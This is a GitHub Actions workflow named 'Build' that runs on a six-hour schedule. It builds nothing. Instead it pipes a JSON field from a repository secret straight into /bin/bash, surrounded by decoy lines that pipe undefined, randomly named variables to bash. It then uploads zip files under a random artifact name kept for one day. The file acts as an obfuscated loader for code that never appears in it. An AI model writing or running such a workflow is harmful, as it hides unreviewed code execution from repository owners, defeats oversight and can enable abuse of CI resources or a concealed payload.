name: Build
on:
  workflow_dispatch:

  schedule:
    - cron: '8 2,8,14,20 * * *'
permissions:
  contents: read
  actions: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  scheduler:
    name: Run task
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - name: Checkout
        uses: actions/checkout@v4
      - name: Invoke
        env:
          wxwnt25: ${{ secrets.wxwnt25 }}
        run: |
          printf '%s' "$wxwnt25" | jq -r .ayjyw76 | /bin/bash
          echo $ndarx544 | jq -r .vfovt4 | /bin/bash
          echo $dpb10987 | jq -r .d75 | /bin/bash
          echo $sfwt5098 | jq -r .xm55143 | /bin/bash
          echo $wueep07315 | jq -r .am621 | /bin/bash
          echo $zunbh96 | jq -r .atkz74 | /bin/bash
          printf '%s' "$gysw25" | jq -r .qxf94 | /bin/bash

      - name: Store artifact
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: ZyiHyMjc
          path: "*.zip"
          retention-days: 1
